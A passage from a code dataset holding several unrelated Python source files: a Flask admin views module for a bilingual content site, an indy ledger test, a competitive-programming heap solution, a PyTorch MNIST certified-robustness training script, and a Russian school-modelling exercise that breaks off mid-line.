redirect(url_for('manage.main_news'))\n\n\n@manage.route('/main_news//')\ndef main_news_state(id, state):\n news = MainNews.query.get(id)\n news.state = state\n\n if state == 0:\n flash(u'BLOG:<%s>已隐藏' % news.ch_title)\n elif state == 1:\n flash(u'BLOG:<%s>已外显' % news.ch_title)\n elif state == 2:\n flash(u'BLOG:<%s>已删除' % news.ch_title)\n db.session.delete(news)\n db.session.commit()\n\n return redirect(url_for('manage.main_news'))\n\n\n@manage.route('/main_news//content', methods=['GET', 'POST'])\ndef main_news_content(id):\n if request.method == 'GET':\n lang = request.args.get('lang', 'ch', type=str)\n news = MainNews.query.get_or_404(id)\n\n return render_template(\"admin/main_news_content.html\", news=news, lang=lang)\n else:\n\n id = request.values.get('id', 0)\n lang = request.values.get('lang', 'cn')\n content = request.values.get('html', '')\n\n news = MainNews.query.get(id)\n if lang == 'cn':\n news.ch_content = content\n else:\n news.en_content = content\n\n db.session.add(news)\n\n return redirect(url_for('manage.main_news'))\n\n\n\n\n\n\n\n\n\n\n\n\n\n@manage.route('/design_carousel')\ndef design_carousel():\n carousels = 
DesignCarousel.query.order_by(DesignCarousel.sort.asc()).all()\n return render_template(\"admin/design_carousel.html\", carousels=carousels)\n\n\n@manage.route('/design_carousel/add', methods=['GET', 'POST'])\ndef design_carousel_detail():\n if request.method == 'GET':\n id = request.args.get('id', 0, type=int)\n slider = DesignCarousel.query.get(id)\n\n return render_template(\"admin/design_carousel_detail.html\", slider=slider)\n else:\n id = request.values.get('id', 0)\n ch_title = request.values.get('ch_title', '')\n en_title = request.values.get('en_title', '')\n web_cover = request.values.get('web_cover', '')\n wap_cover = request.values.get('wap_cover', '')\n\n slider = DesignCarousel.query.get(id)\n if not slider:\n slider = DesignCarousel()\n\n slider.ch_title = ch_title\n slider.en_title = en_title\n slider.web_cover = web_cover\n slider.wap_cover = wap_cover\n db.session.add(slider)\n\n return redirect(url_for('manage.design_carousel'))\n\n\n@manage.route('/design_carousel//')\ndef design_carousel_state(id, state):\n slider = DesignCarousel.query.get(id)\n slider.state = state\n\n if state == 0:\n flash(u'轮播图:<%s>已隐藏' % slider.ch_title)\n elif state == 1:\n\n flash(u'轮播图:<%s>已外显' % slider.ch_title)\n\n return redirect(url_for('manage.design_carousel'))\n\n\n@manage.route('/design_carousel//sort/')\ndef design_carousel_sort(id, move):\n slider = DesignCarousel.query.get(id)\n\n if (slider.sort == 1 and move == 'up') or (slider.sort == 12 and move == 'down'):\n pass\n else:\n if move == 'up':\n tmp_s = DesignCarousel.query.filter_by(sort=slider.sort - 1).first()\n\n slider.sort -= 1\n tmp_s.sort += 1\n else:\n tmp_s = DesignCarousel.query.filter_by(sort=slider.sort + 1).first()\n\n slider.sort += 1\n tmp_s.sort -= 1\n\n db.session.add(slider)\n db.session.add(tmp_s)\n db.session.commit()\n\n return redirect(url_for('manage.design_carousel'))\n\n\n@manage.route('/design_news')\ndef design_news():\n page = request.args.get('page', 1, type=int)\n pagination = DesignNews.query.order_by(DesignNews.create_time.desc()).paginate(page, per_page=10, error_out=False)\n news = pagination.items\n return render_template(\"admin/design_news.html\", news=news, pagination=pagination)\n\n\n@manage.route('/design_news/add', methods=['GET', 'POST'])\ndef design_news_detail():\n if request.method == 'GET':\n id = request.args.get('id', 0, type=int)\n news = DesignNews.query.get(id)\n\n return render_template(\"admin/design_news_detail.html\", news=news)\n else:\n id = request.values.get('id', 0)\n ch_title = request.values.get('ch_title', '')\n en_title = request.values.get('en_title', '')\n ch_author = request.values.get('ch_author', '')\n en_author = request.values.get('en_author', '')\n ch_content = request.values.get('ch_content', '')\n en_content = request.values.get('en_content', '')\n\n news = DesignNews.query.get(id)\n if not news:\n news = DesignNews()\n\n news.ch_title = ch_title\n news.en_title = en_title\n news.ch_author = ch_author\n news.en_author = en_author\n news.ch_content = ch_content\n news.en_content = en_content\n db.session.add(news)\n\n return redirect(url_for('manage.design_news'))\n\n\n@manage.route('/design_news//')\ndef design_news_state(id, state):\n news = DesignNews.query.get(id)\n news.state = state\n\n if state == 0:\n flash(u'BLOG:<%s>已隐藏' % news.ch_title)\n elif state == 1:\n flash(u'BLOG:<%s>已外显' % news.ch_title)\n elif state == 2:\n flash(u'BLOG:<%s>已删除' % news.ch_title)\n db.session.delete(news)\n db.session.commit()\n\n return 
redirect(url_for('manage.design_news'))\n\n\n@manage.route('/design_news/<int:id>/content', methods=['GET', 'POST'])\ndef design_news_content(id):\n    if request.method == 'GET':\n        lang = request.args.get('lang', 'ch', type=str)\n        news = DesignNews.query.get_or_404(id)\n\n        return render_template(\"admin/design_news_content.html\", news=news, lang=lang)\n    else:\n\n        id = request.values.get('id', 0)\n        lang = request.values.get('lang', 'cn')\n        content = request.values.get('html', '')\n\n        news = DesignNews.query.get(id)\n        if lang == 'cn':\n            news.ch_content = content\n        else:\n            news.en_content = content\n\n        db.session.add(news)\n\n        return redirect(url_for('manage.design_news'))\n\n\n@manage.route('/design_project')\ndef design_project():\n    page = request.args.get('page', 1, type=int)\n    pagination = DesignProject.query.order_by(DesignProject.create_time.desc()).paginate(page, per_page=10,\n                                                                                         error_out=False)\n    project = pagination.items\n    return render_template(\"admin/design_project.html\", project=project, pagination=pagination)\n\n\n@manage.route('/design_project/add', methods=['GET', 'POST'])\ndef design_project_detail():\n    if request.method == 'GET':\n        id = request.args.get('id', 0, type=int)\n        project = DesignProject.query.get(id)\n\n        return render_template(\"admin/design_project_detail.html\", project=project)\n    else:\n        id = request.values.get('id', 0)\n        ch_title = request.values.get('ch_title', '')\n        en_title = request.values.get('en_title', '')\n        ch_author = request.values.get('ch_author', '')\n        en_author = request.values.get('en_author', '')\n        cover = request.values.get('cover', '')\n        ch_content = request.values.get('ch_content', '')\n        en_content = request.values.get('en_content', '')\n\n        project = DesignProject.query.get(id)\n        if not project:\n            project = DesignProject()\n\n        project.cover = cover\n        project.ch_title = ch_title\n        project.en_title = en_title\n        project.ch_author = ch_author\n        project.en_author = en_author\n        project.ch_content = ch_content\n        project.en_content = en_content\n        db.session.add(project)\n\n        return redirect(url_for('manage.design_project'))\n\n\n@manage.route('/design_project/<int:id>/<int:state>')\ndef design_project_state(id, state):\n    project = DesignProject.query.get(id)\n    project.state = state\n\n    if state == 0:\n        flash(u'项目:<%s>已隐藏' % project.ch_title)\n    elif state == 1:\n        flash(u'项目:<%s>已外显' % project.ch_title)\n    elif state == 2:\n        flash(u'项目:<%s>已删除' % project.ch_title)\n        db.session.delete(project)\n        db.session.commit()\n\n    return redirect(url_for('manage.design_project'))\n\n\n@manage.route('/design_project/<int:id>/content', methods=['GET', 'POST'])\ndef design_project_content(id):\n    if request.method == 'GET':\n        lang = request.args.get('lang', 'ch', type=str)\n        project = DesignProject.query.get_or_404(id)\n\n        return render_template(\"admin/design_project_content.html\", project=project, lang=lang)\n    else:\n\n        id = request.values.get('id', 0)\n        lang = request.values.get('lang', 'cn')\n        content = request.values.get('html', '')\n\n        project = DesignProject.query.get(id)\n        if lang == 'cn':\n            project.ch_content = content\n        else:\n            project.en_content = content\n\n        db.session.add(project)\n\n        return redirect(url_for('manage.design_project'))\n\n\n@manage.route('/design_project/<int:id>/pictures', methods=['GET', 'POST'])\ndef design_project_pictures(id):\n    if request.method == 'GET':\n        project = DesignProject.query.get_or_404(id)\n        pictures = []\n        if project.pictures:\n            pictures = eval(project.pictures)\n        return render_template(\"admin/design_project_pictures.html\", project=project, pictures=pictures)\n    
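# Illustrative sketch (not part of the original record): design_project_pictures
# above round-trips the picture list through str()/eval() -- the POST branch saves
# str(list) and the GET branch recovers it with eval(project.pictures). A minimal
# demo of that round-trip, plus a json-based variant that avoids eval on stored
# data (the json form is a suggested alternative, not what the original view does):
import json

pictures = ['a.jpg', 'b.jpg']          # hypothetical file names
stored = str(pictures)                 # "['a.jpg', 'b.jpg']" -- what the view saves
assert eval(stored) == pictures        # how the GET branch reads it back

stored_json = json.dumps(pictures)     # '["a.jpg", "b.jpg"]'
assert json.loads(stored_json) == pictures  # same round-trip without eval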
else:\n\n        id = request.values.get('id', 0)\n        pictures = request.values.get('pictures', '')\n        if pictures:\n            pictures = pictures.split(',')\n        else:\n            pictures = []\n        project = DesignProject.query.get(id)\n        project.pictures = str(pictures if pictures and pictures[0] else pictures[1:])\n\n        db.session.add(project)\n\n        return redirect(url_for('manage.design_project'))\n\n\n@manage.route('/events')\ndef events():\n    page = request.args.get('page', 1, type=int)\n    pagination = Event.query.order_by(Event.create_time.desc()).paginate(page, per_page=10, error_out=False)\n    events = pagination.items\n    return render_template(\"admin/events.html\", events=events, pagination=pagination)\n\n\n@manage.route('/events/add', methods=['GET', 'POST'])\ndef events_detail():\n    if request.method == 'GET':\n        id = request.args.get('id', 0, type=int)\n        events = Event.query.get(id)\n\n        return render_template(\"admin/events_detail.html\", events=events)\n    else:\n        id = request.values.get('id', 0)\n        ch_title = request.values.get('ch_title', '')\n        en_title = request.values.get('en_title', '')\n        web_cover = request.values.get('web_cover', '')\n        wap_cover = request.values.get('wap_cover', '')\n        ch_content = request.values.get('ch_content', '')\n        en_content = request.values.get('en_content', '')\n        end_time = request.values.get('end_time', datetime.datetime.now())\n\n        events = Event.query.get(id)\n        if not events:\n            events = Event()\n\n        events.ch_title = ch_title\n        events.en_title = en_title\n        events.web_cover = web_cover\n        events.wap_cover = wap_cover\n        events.ch_content = ch_content\n        events.en_content = en_content\n        events.end_time = end_time\n        db.session.add(events)\n\n        return redirect(url_for('manage.events'))\n\n\n@manage.route('/events/<int:id>/<int:state>')\ndef events_state(id, state):\n    events = Event.query.get(id)\n    events.state = state\n\n    if state == 0:\n        flash(u'活动:<%s>已隐藏' % events.ch_title)\n    elif state == 1:\n        flash(u'活动:<%s>开始' % events.ch_title)\n    elif state == 2:\n        flash(u'活动:<%s>结束' % events.ch_title)\n\n    return redirect(url_for('manage.events'))\n\n\n@manage.route('/events/<int:id>/content', methods=['GET', 'POST'])\ndef events_content(id):\n    if request.method == 'GET':\n        lang = request.args.get('lang', 'ch', type=str)\n        events = Event.query.get_or_404(id)\n\n        return render_template(\"admin/events_content.html\", events=events, lang=lang)\n    else:\n\n        id = request.values.get('id', 0)\n        lang = request.values.get('lang', 'cn')\n        content = request.values.get('html', '')\n\n        events = Event.query.get(id)\n        if lang == 'cn':\n            events.ch_content = content\n        else:\n            events.en_content = content\n\n        db.session.add(events)\n\n        return redirect(url_for('manage.events'))\n\n\n@manage.route('/emembers')\ndef emembers():\n    page = request.args.get('page', 1, type=int)\n    event_id = request.args.get('id', 0, type=int)\n    pagination = EventMember.query \\\n        .filter_by(event_id=event_id) \\\n        .order_by(EventMember.create_time.asc()) \\\n        .paginate(page, per_page=1000, error_out=False)\n    emembers = pagination.items\n    return render_template(\"admin/emembers.html\", emembers=emembers, pagination=pagination)\n\n\n@manage.route('/contacts')\ndef contacts():\n    page = request.args.get('page', 1, type=int)\n    pagination = Contact.query \\\n        .order_by(Contact.create_time.desc()) \\\n        .paginate(page, per_page=1000, error_out=False)\n    contacts = pagination.items\n    return render_template(\"admin/contact.html\", contacts=contacts, pagination=pagination)\n\n\n@manage.route('/hotword')\ndef hotword():\n    hotword = HotWord.query.all()\n    return render_template(\"admin/hotword.html\", 
hotword=hotword)\n\n\n@manage.route('/hotword_detail/add', methods=['GET', 'POST'])\ndef hotword_detail():\n    if request.method == 'GET':\n        id = request.args.get('id', 0, type=int)\n        hotword = HotWord.query.get(id)\n\n        return render_template(\"admin/hotword_detail.html\", hotword=hotword)\n    else:\n        id = request.values.get('id', 0)\n        ch_title = request.values.get('ch_title', '')\n        en_title = request.values.get('en_title', '')\n\n        hotword = HotWord.query.get(id)\n        if not hotword:\n            hotword = HotWord()\n\n        hotword.ch_title = ch_title\n        hotword.en_title = en_title\n        db.session.add(hotword)\n\n        return redirect(url_for('manage.hotword'))\n\n\n@manage.route('/hotword/<int:id>/<int:state>')\ndef hotword_state(id, state):\n    hotword = HotWord.query.get(id)\n    hotword.state = state\n\n    if state == 0:\n        flash(u'推荐词:<%s>已隐藏' % hotword.ch_title)\n    elif state == 1:\n        flash(u'推荐词:<%s>开始' % hotword.ch_title)\n    elif state == 2:\n        flash(u'推荐词:<%s>结束' % hotword.ch_title)\n\n    return redirect(url_for('manage.hotword'))\n\n\n@manage.route('/other')\ndef other():\n    return render_template(\"admin/other.html\")\n\n\n@manage.route('/other/detail', methods=['GET', 'POST'])\ndef other_detail():\n    if request.method == 'GET':\n        other = Other.query.get(1)\n        tp = request.values.get('type', '')\n        return render_template(\"admin/other_detail.html\", content=other.__getattribute__(tp), tp=tp)\n    else:\n        other = Other.query.get(1)\n\n        content = request.values.get('content', '')\n        tp = request.values.get('tp', '')\n        setattr(other, tp, content)\n        db.session.add(other)\n\n        return redirect(url_for('manage.other'))\n\n\n@manage.route('/main_about')\ndef main_about():\n    rows = AppleOther.query.filter_by(style=0, state=1).order_by(AppleOther.sort.asc()).all()\n\n    return render_template(\"admin/appleother.html\", rows=rows, s=0)\n\n\n@manage.route('/main_contact')\ndef main_contact():\n    rows = AppleOther.query.filter_by(style=1, state=1).order_by(AppleOther.sort.asc()).all()\n    return render_template(\"admin/appleother.html\", rows=rows, s=1)\n\n\n@manage.route('/design_history')\ndef design_history():\n    rows = AppleOther.query.filter_by(style=2, state=1).order_by(AppleOther.sort.asc()).all()\n    return render_template(\"admin/appleother.html\", rows=rows, s=2)\n\n\n@manage.route('/design_about')\ndef design_about():\n    rows = AppleOther.query.filter_by(style=3, state=1).order_by(AppleOther.sort.asc()).all()\n    return render_template(\"admin/appleother.html\", rows=rows, s=3)\n\n\n@manage.route('/design_contact')\ndef design_contact():\n    rows = AppleOther.query.filter_by(style=4, state=1).order_by(AppleOther.sort.asc()).all()\n    return render_template(\"admin/appleother.html\", rows=rows, s=4)\n\n\n@manage.route('/appleother/add', methods=['GET', 'POST'])\ndef appleother_detail():\n    url = ''\n    if request.method == 'GET':\n        id = request.args.get('id', 0, type=int)\n        s = request.args.get('s', 0, type=int)\n        other = AppleOther.query.get(id)\n\n        if other:\n            other.ch_content = other.ch_content.replace('
<br/>', '\\r\\n').replace('<br>', '\\n')\n            other.en_content = other.en_content.replace('<br/>', '\\r\\n').replace('<br>
', '\\n')\n        return render_template(\"admin/appleother_detail.html\", other=other, s=s)\n    else:\n        id = request.values.get('id', 0)\n        s = int(request.values.get('s', 0))\n        stype = int(request.values.get('stype', 0))\n        color = int(request.values.get('color', 0))\n        web_cover = request.values.get('web_cover', '')\n        wap_cover = request.values.get('wap_cover', '')\n        ch_title = request.values.get('ch_title', '')\n        en_title = request.values.get('en_title', '')\n        ch_content = request.values.get('ch_content', '')\n        en_content = request.values.get('en_content', '')\n\n        other = AppleOther.query.get(id)\n        if not other:\n            other = AppleOther()\n            other.style = s\n\n            other.sort = AppleOther.query.filter_by(style=s).count() + 1\n\n        other.stype = stype\n        other.color = color\n\n        other.web_cover = web_cover\n        other.wap_cover = wap_cover\n        other.ch_title = ch_title\n        other.en_title = en_title\n\n        other.ch_content = ch_content\n        other.en_content = en_content\n        other.state = 1\n        db.session.add(other)\n\n        url = 'manage.' + ['main_about', 'main_contact', 'design_history', 'design_about', 'design_contact'][other.style]\n\n    return redirect(url_for(url))\n\n\n@manage.route('/appleother/<int:id>/<int:state>')\ndef appleother_state(id, state):\n    other = AppleOther.query.get(id)\n    other.state = state\n\n    url = 'manage.' + ['main_about', 'main_contact', 'design_history', 'design_about', 'design_contact'][other.style]\n\n    if state == 0:\n        flash(u'推荐词:<%s>已删除' % other.ch_title)\n    elif state == 1:\n        flash(u'推荐词:<%s>显示' % other.ch_title)\n\n    return redirect(url_for(url))\n\n\n@manage.route('/appleother/<int:id>/sort/<move>')\ndef appleother_sort(id, move):\n    ao = AppleOther.query.get(id)\n\n    first_sort = AppleOther.query.filter_by(style=ao.style, state=1).order_by(AppleOther.sort.asc()).first()\n    last_sort = AppleOther.query.filter_by(style=ao.style, state=1).order_by(AppleOther.sort.desc()).first()\n\n    if (ao.sort == first_sort.sort and move == 'up') or (ao.sort == last_sort.sort and move == 'down'):\n        pass\n    else:\n        if move == 'up':\n            tmp_s = AppleOther.query.filter_by(sort=ao.sort - 1, style=ao.style, state=1).first()\n            ao.sort -= 1\n            tmp_s.sort += 1\n\n        else:\n            tmp_s = AppleOther.query.filter_by(sort=ao.sort + 1, style=ao.style, state=1).first()\n            ao.sort += 1\n            tmp_s.sort -= 1\n\n        db.session.add(ao)\n        db.session.add(tmp_s)\n        db.session.commit()\n\n    url = 'manage.' 
+ ['main_about', 'main_contact', 'design_history', 'design_about', 'design_contact'][ao.style]\n\n return redirect(url_for(url))\n","sub_path":"app/manage/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":26164,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"246560706","text":"from indy import ledger\n\nimport json\nimport pytest\n\n\n@pytest.mark.asyncio\nasync def test_build_get_revoc_reg_request_work():\n identifier = \"Th7MpTaRZVRYnPiabds81Y\"\n\n rev_reg_def_id = \"RevocRegID\"\n timestamp = 100\n\n expected_response = {\n \"operation\": {\n \"type\": \"116\",\n \"revocRegDefId\": rev_reg_def_id,\n \"timestamp\": timestamp\n }\n }\n\n request = json.loads(await ledger.build_get_revoc_reg_request(identifier, rev_reg_def_id, timestamp))\n assert expected_response.items() <= request.items()\n","sub_path":"wrappers/python/tests/ledger/test_build_get_revoc_reg_request.py","file_name":"test_build_get_revoc_reg_request.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"105083308","text":"input = open('input.txt','r').readline\n\nimport heapq\n\nn = int(input())\na = list(map(int, input().split()))\ndic = {}; ans = []\nfor i in range(n+1)[1:]:\n dic.setdefault(a[i-1],[]).append(i)\nheapq.heapify(a)\nfor i in range(n):\n res = heapq.heappop(a)\n ans.append(dic[res][0])\nprint(*ans)","sub_path":"121---Atcorder/abc142/c/c.py","file_name":"c.py","file_ext":"py","file_size_in_byte":293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"543493633","text":"# -*- coding: utf-8 -*-\n\n### basic modules\nimport numpy as np\nimport time, pickle, os, sys, json, PIL, tempfile, warnings, importlib, math, copy, shutil, setproctitle\nfrom datetime import datetime\n\n### torch modules\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch.autograd import Variable\nfrom torchvision import datasets, transforms\nfrom torch.optim.lr_scheduler import StepLR, MultiStepLR\nimport torch.nn.functional as F\nfrom torch import autograd\n\nfrom torch.utils.data import Dataset, DataLoader, TensorDataset\nfrom torch.optim.lr_scheduler import StepLR, MultiStepLR\nimport data_load, BCP, utils\n\nif __name__ == \"__main__\":\n args = utils.argparser(data='mnist',epochs=60,warmup=1,rampup=20,batch_size=50,epsilon=1.58,epsilon_infty=0.1,epsilon_train=1.58,epsilon_train_infty=0.1,augmentation=False,lr=0.0003,lr_scheduler='multistep',wd_list=[21,30,40],gamma=0.1,opt_iter=10)\n print(datetime.now())\n print(args)\n print('saving file to {}'.format(args.prefix))\n setproctitle.setproctitle(args.prefix)\n train_log = open(args.prefix + \"_train.log\", \"w\")\n test_log = open(args.prefix + \"_test.log\", \"w\")\n train_loader, _ = data_load.data_loaders(args.data, args.batch_size, augmentation=args.augmentation, normalization=args.normalization, drop_last=args.drop_last, shuffle=args.shuffle)\n _, test_loader = data_load.data_loaders(args.data, args.test_batch_size, augmentation=args.augmentation, normalization=args.normalization, drop_last=args.drop_last, shuffle=args.shuffle)\n torch.manual_seed(args.seed)\n torch.cuda.manual_seed(args.seed)\n\n for X,y in train_loader: \n break \n \n best_err = 1\n err = 1\n sampler_indices = []\n model = [utils.select_model(args.data, args.model)]\n print(model[-1]) \n if args.opt == 'adam': \n opt = optim.Adam(model[-1].parameters(), lr=args.lr)\n 
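# Illustrative sketch (not part of the original records): the AtCoder abc142
# snippet above is a heap-based argsort -- it heapifies the values, pops them in
# ascending order, and emits each popped value's original 1-based position. A
# minimal self-contained demo of the same idea; it assumes distinct values
# (the original handles duplicates by keeping a list of positions per value):
import heapq

a = [30, 10, 20]
heap = a[:]
heapq.heapify(heap)                              # min-heap of the values
index_of = {v: i + 1 for i, v in enumerate(a)}   # value -> 1-based position
order = []
while heap:
    order.append(index_of[heapq.heappop(heap)])  # positions in ascending value order
print(order)                                     # [2, 3, 1]
assert order == sorted(range(1, len(a) + 1), key=lambda i: a[i - 1])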
elif args.opt == 'sgd': \n opt = optim.SGD(model[-1].parameters(), lr=args.lr, \n momentum=args.momentum,\n weight_decay=args.weight_decay) \n print(opt)\n if args.lr_scheduler == 'step':\n lr_scheduler = optim.lr_scheduler.StepLR(opt, step_size=args.step_size, gamma=args.gamma)\n elif args.lr_scheduler =='multistep':\n lr_scheduler = MultiStepLR(opt, milestones=args.wd_list, gamma=args.gamma)\n print(lr_scheduler)\n eps_schedule = np.linspace(args.starting_epsilon,\n args.epsilon_train, \n args.schedule_length)\n \n kappa_schedule = np.linspace(args.starting_kappa, \n args.kappa, \n args.kappa_schedule_length)\n u_list = None\n for t in range(args.epochs): \n if t < args.warmup:\n epsilon = 0\n epsilon_next = 0\n elif args.warmup <= t < args.warmup+len(eps_schedule) and args.starting_epsilon is not None: \n epsilon = float(eps_schedule[t-args.warmup])\n epsilon_next = float(eps_schedule[np.min((t+1-args.warmup, len(eps_schedule)-1))])\n else:\n epsilon = args.epsilon_train\n epsilon_next = args.epsilon_train\n \n if t < args.warmup:\n kappa = 1\n kappa_next = 1\n elif args.warmup <= t < args.warmup+len(kappa_schedule):\n kappa = float(kappa_schedule[t-args.warmup])\n kappa_next = float(kappa_schedule[np.min((t+1-args.warmup, len(kappa_schedule)-1))])\n else:\n kappa = args.kappa\n kappa_next = args.kappa\n print('%.f th epoch: epsilon: %.7f - %.7f, kappa: %.4f - %.4f, lr: %.7f'%(t,epsilon,epsilon_next,kappa,kappa_next,opt.state_dict()['param_groups'][0]['lr']))\n \n if t < args.warmup:\n utils.train(train_loader, model[-1], opt, t, train_log, args.verbose)\n _ = utils.evaluate(test_loader, model[-1], t, test_log, args.verbose)\n elif args.method == 'BCP' and args.warmup <= t:\n st = time.time()\n u_list = BCP.train_BCP(train_loader, model[-1], opt, epsilon, kappa, t, train_log, args.verbose, args, u_list)\n print('Taken', time.time()-st, 's/epoch')\n \n err = BCP.evaluate_BCP(test_loader, model[-1], epsilon_next, t, test_log, args.verbose, args, u_list)\n \n \n if args.lr_scheduler == 'step': \n if max(t - (args.rampup + args.warmup - 1) + 1, 0):\n print(\"LR DECAY STEP\")\n lr_scheduler.step(epoch=max(t - (args.rampup + args.warmup - 1) + 1, 0))\n elif args.lr_scheduler =='multistep':\n print(\"LR DECAY STEP\")\n lr_scheduler.step(epoch=t) \n else:\n raise ValueError(\"Wrong LR scheduler\")\n \n if t>=args.warmup+len(eps_schedule): \n if err < best_err and args.save: \n print('Best Error Found! 
%.3f'%err)\n best_err = err\n torch.save({\n 'state_dict' : [m.state_dict() for m in model], \n 'err' : best_err,\n 'epoch' : t,\n 'sampler_indices' : sampler_indices\n }, args.prefix + \"_best.pth\")\n\n torch.save({ \n 'state_dict': [m.state_dict() for m in model],\n 'err' : err,\n 'epoch' : t,\n 'sampler_indices' : sampler_indices\n }, args.prefix + \"_checkpoint.pth\") \n\n args.print = True\n \n aa = torch.load(args.prefix + \"_best.pth\")['state_dict'][0]\n model_eval = utils.select_model(args.data, args.model)\n model_eval.load_state_dict(aa)\n print('std testing ...')\n std_err = utils.evaluate(test_loader, model_eval, t, test_log, args.verbose)\n print('pgd testing ...')\n pgd_err = utils.evaluate_pgd(test_loader, model_eval, args)\n print('verification testing ...')\n if args.method=='BCP':\n last_err = BCP.evaluate_BCP(test_loader, model_eval, args.epsilon, t, test_log, args.verbose, args, u_list) \n print('Best model evaluation:', std_err.item(), pgd_err.item(), last_err.item())\n","sub_path":"train_mnist.py","file_name":"train_mnist.py","file_ext":"py","file_size_in_byte":6215,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"389058947","text":"# lesson6-1, normal\n\n\nclass School:\n def __init__(self, school_name, school_adress, teachers, students):\n self._school_name = school_name\n self._school_adress = school_adress\n self._teachers = teachers\n self._students = students\n\n def get_all_classes(self):\n classes = set([student.get_class_room for student in self._students])\n return list(sorted(classes, key=lambda x: int(x[:-1])))\n\n def get_students(self, class_room):\n return [student.get_short_name for student in self._students if\n class_room == student.get_class_room]\n\n def get_teachers(self, class_room):\n return [teacher.get_short_name for teacher in self._teachers if\n class_room in teacher.get_classes]\n\n def find_student(self, student_full_name):\n for person in self._students:\n if student_full_name == person.get_full_name:\n teachers = [teachers.get_short_name for teachers in\n self._teachers if person.get_class_room in\n teachers.get_classes]\n lessons = [teachers.get_courses for teachers in\n self._teachers if person.get_class_room in\n teachers.get_classes]\n parents = person.get_parents\n\n return {\n 'full_name': student_full_name,\n 'class_room': person.get_class_room,\n 'teachers': teachers,\n 'lessons': lessons,\n 'parents': parents\n }\n\n @property\n def name(self):\n return 'Муниципальное образовательное учреждение ' \\\n '\"{}\"'.format(self._school_name)\n\n @property\n def adress(self):\n return '{}'.format(self._school_adress)\n\n\nclass People:\n def __init__(self, last_name, first_name, middle_name):\n self._last_name = last_name\n self._first_name = first_name\n self._middle_name = middle_name\n\n @property\n def get_full_name(self):\n return '{0} {1} {2}'.format(self._last_name,\n self._first_name,\n self._middle_name)\n\n @property\n def get_short_name(self):\n return '{0} {1}.{2}.'.format(self._last_name,\n self._first_name[:1],\n self._middle_name[:1])\n\n\nclass Student(People):\n def __init__(self, last_name, first_name, middle_name,\n class_room, mather, father):\n People.__init__(self, last_name, first_name, middle_name)\n self._class_room = class_room\n self._parents = {\n 'mather': mather,\n 'father': father\n }\n\n @property\n def get_class_room(self):\n return self._class_room\n\n @property\n def get_parents(self):\n return self._parents\n\n\nclass Teacher(People):\n def 
__init__(self, last_name, first_name, middle_name,\n                 courses, classes):\n        People.__init__(self, last_name, first_name, middle_name)\n        self._courses = courses\n        self._classes = classes\n\n    @property\n    def get_courses(self):\n        return self._courses\n\n    @property\n    def get_classes(self):\n        return self._classes\n\n\nteachers = [\n    Teacher('Жукова', 'Людмила', 'Александровна', 'Математика',\n            ['7А', '7Б', '8А', '8Б', '9А', '9Б', '10А', '10Б', '11А', '11Б']),\n    Teacher('Белик', 'Вячеслав', 'Валерьевич', 'Информатика',\n            ['10А', '10Б', '11А', '11Б']),\n    Teacher('Лакина', 'Надежда', 'Фёдоровна', 'История',\n            ['7А', '7Б', '8А', '8Б', '9А', '9Б', '10А', '10Б', '11А', '11Б']),\n    Teacher('Мордвинова', 'Татьяна', 'Владимировна', 'Литература',\n            ['7А', '7Б', '8А', '8Б', '9А', '9Б', '10А', '10Б', '11А', '11Б']),\n    Teacher('Лагута', 'Татьяна', 'Ивановна', 'География',\n            ['7А', '7Б', '8А', '8Б', '9А', '9Б'])\n    ]\n\nstudents = [\n    Student('Юрин', 'Александр', 'Александрович', '10Б',\n            'Юрина О. А.', 'Юрин А. В.'),\n    Student('Пантелеев', 'Евгений', 'Алексеевич', '11А',\n            'Пантелеева Т.В.', 'Пантелеев А.В.'),\n    Student('Мотовилов', 'Константин', 'Сергеевич', '11Б',\n            'Мотовилова А.Д.', 'Мотовилов С.А.'),\n    Student('Патосин', 'Виталий', 'Николаевич', '10А',\n            'Патосина А.К.', 'Патосин Н.В.'),\n    Student('Бочкин', 'Артём', 'Александрович', '9Б',\n            'Бочкина В.А.', 'Бочкин А.Т'),\n    Student('Никитин', 'Никита', 'Никитыч', '9А',\n            'Никитина Н.А.', 'Никитин Н.С.'),\n    Student('Ягодина', 'Дарья', 'Александровна', '8Б',\n            'Ягодина А.В.', 'Ягодин А.С.'),\n    Student('Панфилов', 'Андрей', 'Васильевич', '8А',\n            'Панфилова Е.В.', 'Панфилов В.С.'),\n    Student('Андреева', 'Анна', 'Владимировна', '7Б',\n            'Андреева А.Д.', 'Андреев В.А.'),\n    Student('Сливкин', 'Михаил', 'Аркадьевич', '7А',\n            'Сливкина А.Г.', 'Сливкин А.С.'),\n    Student('Циганков', 'Александр', 'Сергеевич', '10Б',\n            'Цыгакова О. А.', 'Циганков С. В.'),\n    Student('Цыганков', 'Алексей', 'Сергеевич', '11А',\n            'Цыгакова О. А.', 'Циганков С. 
В..'),\n Student('Макарова', 'Ирина', 'Александровна', '11Б',\n 'Макарова А.Д.', 'Макаров А.А.'),\n Student('Кравченко', 'Александр', 'Владимирович', '10А',\n 'Кравченко Е.К.', 'Кравченко В.В.'),\n Student('Беляева', 'Мария', 'Вячеславовна', '9Б',\n 'Беляева В.А.', 'Беляев В.Т'),\n Student('Рыбакова', 'Лидия', 'Константиновна', '9А',\n 'Рыбакова Н.А.', 'Рыбаков К.С.'),\n Student('Абрамкин', 'Ярослав', 'Александрович', '8Б',\n 'Абрамкина А.В.', 'Абрамкин А.С.'),\n Student('Стенькина', 'Анжелла', 'Васильевна', '8А',\n 'Стенькина Е.В.', 'Стенькин В.С.'),\n Student('Садыкова', 'Лилия', 'Владимировна', '7Б',\n 'Садыкова А.Д.', 'Садыков В.А.'),\n Student('Андросова', 'Анна', 'Сергеевна', '7А',\n 'Андросова А.Г.', 'Андросов С.С.'),\n ]\n\n\nschool = School('Гимназия №8', '630068, г.Новосибирск, '\n 'ул.Ученическая 8', teachers, students)\n\nprint(school.name)\nprint(school.adress)\n\nprint('\\nСписок классов школы:')\nprint(', '.join(school.get_all_classes()))\n\nprint('\\nСписок \"10Б\" класса:')\nprint('\\n'.join(school.get_students('10Б')))\n\nstudent = school.find_student('Юрин Александр Александрович')\nprint('\\nУченик: 